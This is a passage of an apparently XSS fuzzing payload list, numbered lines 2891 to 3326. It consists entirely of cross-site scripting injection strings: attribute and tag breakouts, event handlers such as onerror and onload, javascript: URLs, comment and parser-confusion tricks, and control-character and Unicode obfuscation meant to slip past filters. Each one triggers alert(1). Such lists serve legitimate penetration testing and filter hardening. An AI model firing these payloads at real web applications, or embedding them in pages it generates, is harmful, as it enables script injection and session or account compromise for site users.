  2891. "><a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2892. '><a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2893. <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2894. "><a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2895. '><a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2896. <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2897. "><a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2898. '><a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2899. <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2900. "><a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2901. '><a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2902. <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2903. "><a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2904. '><a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2905. <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2906. "><a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2907. '><a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2908. <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2909. "><a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2910. '><a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2911. <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
  2912. "><a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
  2913. '><a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
  2914. <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
  2915. "><a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
  2916. '><a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
  2917. <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
  2918. "><a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
  2919. '><a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
  2920. <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
  2921. "><a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
  2922. '><a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
  2923. <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
  2924. "><a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
  2925. '><a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
  2926. `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
  2927. `"'><img src=xxx:x \x22onerror=javascript:alert(1)>
  2928. `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
  2929. `"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
  2930. `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
  2931. `"'><img src=xxx:x \x09onerror=javascript:alert(1)>
  2932. `"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
  2933. `"'><img src=xxx:x \x00onerror=javascript:alert(1)>
  2934. `"'><img src=xxx:x \x27onerror=javascript:alert(1)>
  2935. `"'><img src=xxx:x \x20onerror=javascript:alert(1)>
  2936. `"'><img src=x onerror=javascript:alert(&#039;1&#039;)>
  2937. "><img src=x onerror=javascript:alert(&#039;1&#039;)>
  2938. '><img src=x onerror=javascript:alert(&#039;1&#039;)>
  2939. <img src=x onerror=javascript:alert(&#039;1&#039;)>
  2940. "><img src=x onerror=javascript:alert(&#039;1&#039;)>
  2941. '><img src=x onerror=javascript:alert(&#039;1&#039;)>
  2942. "`'><script>\x3Bjavascript:alert(1)</script>
  2943. "`'><script>\x0Djavascript:alert(1)</script>
  2944. "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
  2945. "`'><script>\xE2\x80\x81javascript:alert(1)</script>
  2946. "`'><script>\xE2\x80\x84javascript:alert(1)</script>
  2947. "`'><script>\xE3\x80\x80javascript:alert(1)</script>
  2948. "`'><script>\x09javascript:alert(1)</script>
  2949. "`'><script>\xE2\x80\x89javascript:alert(1)</script>
  2950. "`'><script>\xE2\x80\x85javascript:alert(1)</script>
  2951. "`'><script>\xE2\x80\x88javascript:alert(1)</script>
  2952. "`'><script>\x00javascript:alert(1)</script>
  2953. "`'><script>\xE2\x80\xA8javascript:alert(1)</script>
  2954. "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
  2955. "`'><script>\xE1\x9A\x80javascript:alert(1)</script>
  2956. "`'><script>\x0Cjavascript:alert(1)</script>
  2957. "`'><script>\x2Bjavascript:alert(1)</script>
  2958. "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
  2959. "`'><script>-javascript:alert(1)</script>
  2960. "`'><script>\x0Ajavascript:alert(1)</script>
  2961. "`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
  2962. "`'><script>\x7Ejavascript:alert(1)</script>
  2963. "`'><script>\xE2\x80\x87javascript:alert(1)</script>
  2964. "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
  2965. "`'><script>\xE2\x80\xA9javascript:alert(1)</script>
  2966. "`'><script>\xC2\x85javascript:alert(1)</script>
  2967. "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
  2968. "`'><script>\xE2\x80\x83javascript:alert(1)</script>
  2969. "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
  2970. "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
  2971. "`'><script>\xE2\x80\x80javascript:alert(1)</script>
  2972. "`'><script>\x21javascript:alert(1)</script>
  2973. "`'><script>\xE2\x80\x82javascript:alert(1)</script>
  2974. "`'><script>\xE2\x80\x86javascript:alert(1)</script>
  2975. "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
  2976. "`'><script>\x0Bjavascript:alert(1)</script>
  2977. "`'><script>\x20javascript:alert(1)</script>
  2978. "`'><script>\xC2\xA0javascript:alert(1)</script>
  2979. "/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
  2980. "><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
  2981. '><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
  2982. "/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
  2983. "><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
  2984. '><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
  2985. "/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
  2986. "><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
  2987. '><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
  2988. "/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
  2989. "><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
  2990. '><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
  2991. "/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
  2992. "><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
  2993. '><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
  2994. "/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
  2995. "><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
  2996. '><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
  2997. "/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
  2998. "><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
  2999. '><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
  3000. "/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
  3001. "><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
  3002. '><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
  3003. "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
  3004. "><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
  3005. '><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
  3006. <img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
  3007. "><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
  3008. '><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
  3009. <img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
  3010. "><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
  3011. '><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
  3012. <img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
  3013. "><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
  3014. '><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
  3015. <img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
  3016. "><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
  3017. '><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
  3018. <img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
  3019. "><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
  3020. '><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
  3021. <img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
  3022. "><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
  3023. '><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
  3024. <img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
  3025. "><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
  3026. '><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
  3027. <img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
  3028. "><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
  3029. '><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
  3030. <img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
  3031. "><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
  3032. '><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
  3033. <script\x2F>javascript:alert(1)</script>
  3034. "><script\x2F>javascript:alert(1)</script>
  3035. '><script\x2F>javascript:alert(1)</script>
  3036. <script\x20>javascript:alert(1)</script>
  3037. "><script\x20>javascript:alert(1)</script>
  3038. '><script\x20>javascript:alert(1)</script>
  3039. <script\x0D>javascript:alert(1)</script>
  3040. "><script\x0D>javascript:alert(1)</script>
  3041. '><script\x0D>javascript:alert(1)</script>
  3042. <script\x0A>javascript:alert(1)</script>
  3043. "><script\x0A>javascript:alert(1)</script>
  3044. '><script\x0A>javascript:alert(1)</script>
  3045. <script\x0C>javascript:alert(1)</script>
  3046. "><script\x0C>javascript:alert(1)</script>
  3047. '><script\x0C>javascript:alert(1)</script>
  3048. <script\x00>javascript:alert(1)</script>
  3049. "><script\x00>javascript:alert(1)</script>
  3050. '><script\x00>javascript:alert(1)</script>
  3051. <script\x09>javascript:alert(1)</script>
  3052. "><script\x09>javascript:alert(1)</script>
  3053. '><script\x09>javascript:alert(1)</script>
  3054. `"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
  3055. `"'><img src=xxx:x onerror\x00=javascript:alert(1)>
  3056. `"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
  3057. `"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
  3058. `"'><img src=xxx:x onerror\x20=javascript:alert(1)>
  3059. `"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
  3060. `"'><img src=xxx:x onerror\x09=javascript:alert(1)>
  3061. <script>javascript:alert(1)<\x00/script>
  3062. "><script>javascript:alert(1)<\x00/script>
  3063. '><script>javascript:alert(1)<\x00/script>
  3064. <img src=# onerror\x3D"javascript:alert(1)" >
  3065. "><img src=# onerror\x3D"javascript:alert(1)" >
  3066. '><img src=# onerror\x3D"javascript:alert(1)" >
  3067. <video poster=javascript:javascript:alert(1)//
  3068. "><video poster=javascript:javascript:alert(1)//
  3069. '><video poster=javascript:javascript:alert(1)//
  3070. <body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  3071. "><body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  3072. '><body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  3073. <form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
  3074. "><form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
  3075. '><form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
  3076. <video><source onerror="javascript:javascript:alert(1)">
  3077. "><video><source onerror="javascript:javascript:alert(1)">
  3078. '><video><source onerror="javascript:javascript:alert(1)">
  3079. <video onerror="javascript:javascript:alert(1)"><source>
  3080. "><video onerror="javascript:javascript:alert(1)"><source>
  3081. '><video onerror="javascript:javascript:alert(1)"><source>
  3082. <form><button formaction="javascript:javascript:alert(1)">X
  3083. "><form><button formaction="javascript:javascript:alert(1)">X
  3084. '><form><button formaction="javascript:javascript:alert(1)">X
  3085. <body oninput=javascript:alert(1)><input autofocus>
  3086. "><body oninput=javascript:alert(1)><input autofocus>
  3087. '><body oninput=javascript:alert(1)><input autofocus>
  3088. <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://127.0.0.1:3555/xss_serve_payloads/X.html" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
  3089. "><math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://127.0.0.1:3555/xss_serve_payloads/X.html" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
  3090. '><math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://127.0.0.1:3555/xss_serve_payloads/X.html" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
  3091. <frameset onload=javascript:alert(1)>
  3092. "><frameset onload=javascript:alert(1)>
  3093. '><frameset onload=javascript:alert(1)>
  3094. <table background="javascript:javascript:alert(1)">
  3095. "><table background="javascript:javascript:alert(1)">
  3096. '><table background="javascript:javascript:alert(1)">
  3097. <!--<img src="--><img src=x onerror=javascript:alert(1)//">
  3098. "><!--<img src="--><img src=x onerror=javascript:alert(1)//">
  3099. '><!--<img src="--><img src=x onerror=javascript:alert(1)//">
  3100. <comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
  3101. "><comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
  3102. '><comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
  3103. <![><img src="]><img src=x onerror=javascript:alert(1)//">
  3104. "><![><img src="]><img src=x onerror=javascript:alert(1)//">
  3105. '><![><img src="]><img src=x onerror=javascript:alert(1)//">
  3106. <style><img src="</style><img src=x onerror=javascript:alert(1)//">
  3107. "><style><img src="</style><img src=x onerror=javascript:alert(1)//">
  3108. '><style><img src="</style><img src=x onerror=javascript:alert(1)//">
  3109. <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
  3110. "><li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
  3111. '><li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
  3112. <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">X</a></body>
  3113. "><head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">X</a></body>
  3114. '><head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">X</a></body>
  3115. <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
  3116. "><SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
  3117. '><SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
  3118. <object data="data:text/html;base64,%(base64)s">
  3119. "><object data="data:text/html;base64,%(base64)s">
  3120. '><object data="data:text/html;base64,%(base64)s">
  3121. <embed src="data:text/html;base64,%(base64)s">
  3122. "><embed src="data:text/html;base64,%(base64)s">
  3123. '><embed src="data:text/html;base64,%(base64)s">
  3124. <b <script>alert(1)</script>
  3125. "><script>alert(1)</script>
  3126. '><script>alert(1)</script>0
  3127. <div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
  3128. "><div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
  3129. '><div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
  3130. <x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
  3131. "><x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
  3132. '><x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
  3133. <embed src="javascript:alert(1)">
  3134. "><embed src="javascript:alert(1)">
  3135. '><embed src="javascript:alert(1)">
  3136. <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
  3137. "><div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
  3138. '><div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
  3139. <? foo="><script>javascript:alert(1)</script>
  3140. "><script>javascript:alert(1)</script>
  3141. '><script>javascript:alert(1)</script>">
  3142. "><? foo="><script>javascript:alert(1)</script>
  3143. "><script>javascript:alert(1)</script>
  3144. '><script>javascript:alert(1)</script>">
  3145. '><? foo="><script>javascript:alert(1)</script>
  3146. "><script>javascript:alert(1)</script>
  3147. '><script>javascript:alert(1)</script>">
  3148. <! foo="><script>javascript:alert(1)</script>
  3149. "><script>javascript:alert(1)</script>
  3150. '><script>javascript:alert(1)</script>">
  3151. "><! foo="><script>javascript:alert(1)</script>
  3152. "><script>javascript:alert(1)</script>
  3153. '><script>javascript:alert(1)</script>">
  3154. '><! foo="><script>javascript:alert(1)</script>
  3155. "><script>javascript:alert(1)</script>
  3156. '><script>javascript:alert(1)</script>">
  3157. </ foo="><script>javascript:alert(1)</script>
  3158. "><script>javascript:alert(1)</script>
  3159. '><script>javascript:alert(1)</script>">
  3160. "></ foo="><script>javascript:alert(1)</script>
  3161. "><script>javascript:alert(1)</script>
  3162. '><script>javascript:alert(1)</script>">
  3163. '></ foo="><script>javascript:alert(1)</script>
  3164. "><script>javascript:alert(1)</script>
  3165. '><script>javascript:alert(1)</script>">
  3166. <? foo="><x foo='?><script>javascript:alert(1)</script>
  3167. "><script>javascript:alert(1)</script>
  3168. '><script>javascript:alert(1)</script>'>">
  3169. "><? foo="><x foo='?><script>javascript:alert(1)</script>
  3170. "><script>javascript:alert(1)</script>
  3171. '><script>javascript:alert(1)</script>'>">
  3172. '><? foo="><x foo='?><script>javascript:alert(1)</script>
  3173. "><script>javascript:alert(1)</script>
  3174. '><script>javascript:alert(1)</script>'>">
  3175. <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>
  3176. "><script>javascript:alert(1)</script>
  3177. '><script>javascript:alert(1)</script>">
  3178. "><! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>
  3179. "><script>javascript:alert(1)</script>
  3180. '><script>javascript:alert(1)</script>">
  3181. '><! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>
  3182. "><script>javascript:alert(1)</script>
  3183. '><script>javascript:alert(1)</script>">
  3184. <% foo><x foo="%><script>javascript:alert(1)</script>
  3185. "><script>javascript:alert(1)</script>
  3186. '><script>javascript:alert(1)</script>">
  3187. "><% foo><x foo="%><script>javascript:alert(1)</script>
  3188. "><script>javascript:alert(1)</script>
  3189. '><script>javascript:alert(1)</script>">
  3190. '><% foo><x foo="%><script>javascript:alert(1)</script>
  3191. "><script>javascript:alert(1)</script>
  3192. '><script>javascript:alert(1)</script>">
  3193. <div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
  3194. "><div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
  3195. '><div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
  3196. <img \x00src=x onerror="alert(1)">
  3197. "><img \x00src=x onerror="alert(1)">
  3198. '><img \x00src=x onerror="alert(1)">
  3199. <img \x47src=x onerror="javascript:alert(1)">
  3200. "><img \x47src=x onerror="javascript:alert(1)">
  3201. '><img \x47src=x onerror="javascript:alert(1)">
  3202. <img \x11src=x onerror="javascript:alert(1)">
  3203. "><img \x11src=x onerror="javascript:alert(1)">
  3204. '><img \x11src=x onerror="javascript:alert(1)">
  3205. <img \x12src=x onerror="javascript:alert(1)">
  3206. "><img \x12src=x onerror="javascript:alert(1)">
  3207. '><img \x12src=x onerror="javascript:alert(1)">
  3208. <img\x47src=x onerror="javascript:alert(1)">
  3209. "><img\x47src=x onerror="javascript:alert(1)">
  3210. '><img\x47src=x onerror="javascript:alert(1)">
  3211. <img\x10src=x onerror="javascript:alert(1)">
  3212. "><img\x10src=x onerror="javascript:alert(1)">
  3213. '><img\x10src=x onerror="javascript:alert(1)">
  3214. <img\x13src=x onerror="javascript:alert(1)">
  3215. "><img\x13src=x onerror="javascript:alert(1)">
  3216. '><img\x13src=x onerror="javascript:alert(1)">
  3217. <img\x32src=x onerror="javascript:alert(1)">
  3218. "><img\x32src=x onerror="javascript:alert(1)">
  3219. '><img\x32src=x onerror="javascript:alert(1)">
  3220. <img\x11src=x onerror="javascript:alert(1)">
  3221. "><img\x11src=x onerror="javascript:alert(1)">
  3222. '><img\x11src=x onerror="javascript:alert(1)">
  3223. <img \x34src=x onerror="javascript:alert(1)">
  3224. "><img \x34src=x onerror="javascript:alert(1)">
  3225. '><img \x34src=x onerror="javascript:alert(1)">
  3226. <img \x39src=x onerror="javascript:alert(1)">
  3227. "><img \x39src=x onerror="javascript:alert(1)">
  3228. '><img \x39src=x onerror="javascript:alert(1)">
  3229. <img \x00src=x onerror="javascript:alert(1)">
  3230. "><img \x00src=x onerror="javascript:alert(1)">
  3231. '><img \x00src=x onerror="javascript:alert(1)">
  3232. <img src\x09=x onerror="javascript:alert(1)">
  3233. "><img src\x09=x onerror="javascript:alert(1)">
  3234. '><img src\x09=x onerror="javascript:alert(1)">
  3235. <img src\x10=x onerror="javascript:alert(1)">
  3236. "><img src\x10=x onerror="javascript:alert(1)">
  3237. '><img src\x10=x onerror="javascript:alert(1)">
  3238. <img src\x13=x onerror="javascript:alert(1)">
  3239. "><img src\x13=x onerror="javascript:alert(1)">
  3240. '><img src\x13=x onerror="javascript:alert(1)">
  3241. <img src\x32=x onerror="javascript:alert(1)">
  3242. "><img src\x32=x onerror="javascript:alert(1)">
  3243. '><img src\x32=x onerror="javascript:alert(1)">
  3244. <img src\x12=x onerror="javascript:alert(1)">
  3245. "><img src\x12=x onerror="javascript:alert(1)">
  3246. '><img src\x12=x onerror="javascript:alert(1)">
  3247. <img src\x11=x onerror="javascript:alert(1)">
  3248. "><img src\x11=x onerror="javascript:alert(1)">
  3249. '><img src\x11=x onerror="javascript:alert(1)">
  3250. <img src\x00=x onerror="javascript:alert(1)">
  3251. "><img src\x00=x onerror="javascript:alert(1)">
  3252. '><img src\x00=x onerror="javascript:alert(1)">
  3253. <img src\x47=x onerror="javascript:alert(1)">
  3254. "><img src\x47=x onerror="javascript:alert(1)">
  3255. '><img src\x47=x onerror="javascript:alert(1)">
  3256. <img src=x\x09onerror="javascript:alert(1)">
  3257. "><img src=x\x09onerror="javascript:alert(1)">
  3258. '><img src=x\x09onerror="javascript:alert(1)">
  3259. <img src=x\x10onerror="javascript:alert(1)">
  3260. "><img src=x\x10onerror="javascript:alert(1)">
  3261. '><img src=x\x10onerror="javascript:alert(1)">
  3262. <img src=x\x11onerror="javascript:alert(1)">
  3263. "><img src=x\x11onerror="javascript:alert(1)">
  3264. '><img src=x\x11onerror="javascript:alert(1)">
  3265. <img src=x\x12onerror="javascript:alert(1)">
  3266. "><img src=x\x12onerror="javascript:alert(1)">
  3267. '><img src=x\x12onerror="javascript:alert(1)">
  3268. <img src=x\x13onerror="javascript:alert(1)">
  3269. "><img src=x\x13onerror="javascript:alert(1)">
  3270. '><img src=x\x13onerror="javascript:alert(1)">
  3271. <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
  3272. "><img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
  3273. '><img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
  3274. <img src=x onerror=\x09"javascript:alert(1)">
  3275. "><img src=x onerror=\x09"javascript:alert(1)">
  3276. '><img src=x onerror=\x09"javascript:alert(1)">
  3277. <img src=x onerror=\x10"javascript:alert(1)">
  3278. "><img src=x onerror=\x10"javascript:alert(1)">
  3279. '><img src=x onerror=\x10"javascript:alert(1)">
  3280. <img src=x onerror=\x11"javascript:alert(1)">
  3281. "><img src=x onerror=\x11"javascript:alert(1)">
  3282. '><img src=x onerror=\x11"javascript:alert(1)">
  3283. <img src=x onerror=\x12"javascript:alert(1)">
  3284. "><img src=x onerror=\x12"javascript:alert(1)">
  3285. '><img src=x onerror=\x12"javascript:alert(1)">
  3286. <img src=x onerror=\x32"javascript:alert(1)">
  3287. "><img src=x onerror=\x32"javascript:alert(1)">
  3288. '><img src=x onerror=\x32"javascript:alert(1)">
  3289. <img src=x onerror=\x00"javascript:alert(1)">
  3290. "><img src=x onerror=\x00"javascript:alert(1)">
  3291. '><img src=x onerror=\x00"javascript:alert(1)">
  3292. <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>X</a>
  3293. "><a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>X</a>
  3294. '><a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>X</a>
  3295. <img src="x` `<script>javascript:alert(1)</script>
  3296. "><script>javascript:alert(1)</script>
  3297. '><script>javascript:alert(1)</script>"` `>
  3298. "><img src="x` `<script>javascript:alert(1)</script>
  3299. "><script>javascript:alert(1)</script>
  3300. '><script>javascript:alert(1)</script>"` `>
  3301. '><img src="x` `<script>javascript:alert(1)</script>
  3302. "><script>javascript:alert(1)</script>
  3303. '><script>javascript:alert(1)</script>"` `>
  3304. <img src onerror /" '"= alt=javascript:alert(1)//">
  3305. "><img src onerror /" '"= alt=javascript:alert(1)//">
  3306. '><img src onerror /" '"= alt=javascript:alert(1)//">
  3307. <title onpropertychange=javascript:alert(1)></title><title title=>
  3308. "><title onpropertychange=javascript:alert(1)></title><title title=>
  3309. '><title onpropertychange=javascript:alert(1)></title><title title=>
  3310. <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
  3311. "><a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
  3312. '><a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
  3313. <!--[if]><script>javascript:alert(1)</script -->
  3314. "><!--[if]><script>javascript:alert(1)</script -->
  3315. '><!--[if]><script>javascript:alert(1)</script -->
  3316. <!--[if<img src=x onerror=javascript:alert(1)//]> -->
  3317. "><!--[if<img src=x onerror=javascript:alert(1)//]> -->
  3318. '><!--[if<img src=x onerror=javascript:alert(1)//]> -->
  3319. <script src="/\%(jscript)s"></script>
  3320. "><script src="/\%(jscript)s"></script>
  3321. '><script src="/\%(jscript)s"></script>
  3322. <script src="\\%(jscript)s"></script>
  3323. "><script src="\\%(jscript)s"></script>
  3324. '><script src="\\%(jscript)s"></script>
  3325. <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
  3326. "><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
